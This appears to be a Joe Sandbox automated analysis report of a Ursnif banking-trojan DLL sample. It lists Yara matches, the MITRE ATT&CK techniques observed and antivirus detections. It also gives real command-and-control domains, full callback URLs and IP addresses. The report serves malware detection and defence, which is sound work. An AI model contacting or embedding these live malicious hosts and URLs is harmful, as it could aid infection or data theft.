Source: Yara match	File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match	File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Regsvr32	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	124 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ursnif_IAT_corrected.exe.dll	56%	Virustotal		Browse
ursnif_IAT_corrected.exe.dll	100%	Avira	TR/Spy.Gen
ursnif_IAT_corrected.exe.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.7f0000.0.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
3.2.regsvr32.exe.2af0000.0.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
5.2.rundll32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.45e0000.0.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
4.2.rundll32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.2e30000.0.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
3.2.regsvr32.exe.10000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
linetwork.top	12%	Virustotal		Browse
onlinetwork.top	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk	0%	Avira URL Cloud	safe
http://onlinetwork.top/)	0%	Avira URL Cloud	safe
http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7	0%	Avira URL Cloud	safe
http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo	0%	Avira URL Cloud	safe
http://onlinetwork.top/	12%	Virustotal		Browse
http://onlinetwork.top/	0%	Avira URL Cloud	safe
http://onlinetwork.top/M	0%	Avira URL Cloud	safe
http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K	0%	Avira URL Cloud	safe
http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/	0%	Avira URL Cloud	safe
http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR	0%	Avira URL Cloud	safe
http://linetwork.top/drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk	0%	Avira URL Cloud	safe
http://linetwork.top/drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk	0%	Avira URL Cloud	safe
http://config.ed4	0%	Avira URL Cloud	safe
http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk	0%	Avira URL Cloud	safe
http://linetwork.top/7	0%	Avira URL Cloud	safe
http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF	0%	Avira URL Cloud	safe
http://config.edge.skype	0%	Avira URL Cloud	safe
http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5	0%	Avira URL Cloud	safe
http://linetwork.top/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
linetwork.top	62.173.145.183	true	true	12%, Virustotal, Browse	unknown
onlinetwork.top	31.41.44.194	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk	true	Avira URL Cloud: safe	unknown
http://linetwork.top/drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk	true	Avira URL Cloud: safe	unknown
http://linetwork.top/drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk	true	Avira URL Cloud: safe	unknown
http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://onlinetwork.top/	regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://onlinetwork.top/)	regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7	regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.816986286.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo	rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://onlinetwork.top/M	rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K	rundll32.exe, 00000005.00000002.817185971.0000000002E0C000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/	regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR	rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://config.ed4	rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF	rundll32.exe, 00000004.00000002.817078743.0000000002E65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://linetwork.top/7	rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5	regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://config.edge.skype	rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://linetwork.top/	rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.173.145.183	linetwork.top	Russian Federation		34300	SPACENET-ASInternetServiceProviderRU	true
31.41.44.194	onlinetwork.top	Russian Federation		56577	ASRELINKRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	727158
Start date and time:	2022-10-21 00:24:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ursnif_IAT_corrected.exe.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@10/0@8/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 82% (good quality ratio 77.8%) Quality average: 80.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 101 Number of non-executed functions: 88
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16
Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:25:01	API Interceptor	2x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
62.173.145.183	cVZ5IwmAMe.dll	Get hash	malicious	Browse
62.173.145.183	Invoice_7892_18Oct.html	Get hash	malicious	Browse
31.41.44.194	cVZ5IwmAMe.dll	Get hash	malicious	Browse
31.41.44.194	Invoice_7892_18Oct.html	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
onlinetwork.top	cVZ5IwmAMe.dll	Get hash	malicious	Browse	31.41.44.194
onlinetwork.top	Invoice_7892_18Oct.html	Get hash	malicious	Browse	31.41.44.194
linetwork.top	cVZ5IwmAMe.dll	Get hash	malicious	Browse	31.41.44.194
linetwork.top	Invoice_7892_18Oct.html	Get hash	malicious	Browse	31.41.44.194

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SPACENET-ASInternetServiceProviderRU	cVZ5IwmAMe.dll	Get hash	malicious	Browse	62.173.145.183
	Invoice_7892_18Oct.html	Get hash	malicious	Browse	62.173.145.183
	RyIv1GopUw.elf	Get hash	malicious	Browse	176.120.92.68
	u7kwB6NxXv.dll	Get hash	malicious	Browse	62.173.149.9
	630f2da7d3d69.dll	Get hash	malicious	Browse	62.173.149.9
	4388097.img	Get hash	malicious	Browse	62.173.149.9
	D2F9DC8E7278A2EC0AA634536AC8D23DB209ABA8CA0E1.exe	Get hash	malicious	Browse	185.31.160.74
	62fff09cd4239.dll	Get hash	malicious	Browse	62.173.149.9
	WE2hCaCA1t	Get hash	malicious	Browse	176.120.90.228
	ISKMdyCaqo	Get hash	malicious	Browse	85.93.146.199
	xd.arm7	Get hash	malicious	Browse	176.120.67.99
	Z0xvzu3YvS	Get hash	malicious	Browse	176.120.80.81
	1CDAOjQEQP.exe	Get hash	malicious	Browse	185.31.160.74
	zeno.arm5	Get hash	malicious	Browse	62.173.159.178
	7KO9wDFZk2	Get hash	malicious	Browse	176.120.80.40
	dIY3hZhbVQ	Get hash	malicious	Browse	176.120.79.94
	j2SujqY9zf	Get hash	malicious	Browse	62.173.159.169
	ICDA4u860m	Get hash	malicious	Browse	62.173.159.131
	apep.x86	Get hash	malicious	Browse	62.173.159.164
	yVI4Rkssc0	Get hash	malicious	Browse	176.120.79.64
ASRELINKRU	cVZ5IwmAMe.dll	Get hash	malicious	Browse	31.41.44.194
	Invoice_7892_18Oct.html	Get hash	malicious	Browse	31.41.44.194
	630f6688cd953.dll	Get hash	malicious	Browse	31.41.44.27
	AQwY6K383C.dll	Get hash	malicious	Browse	31.41.44.27
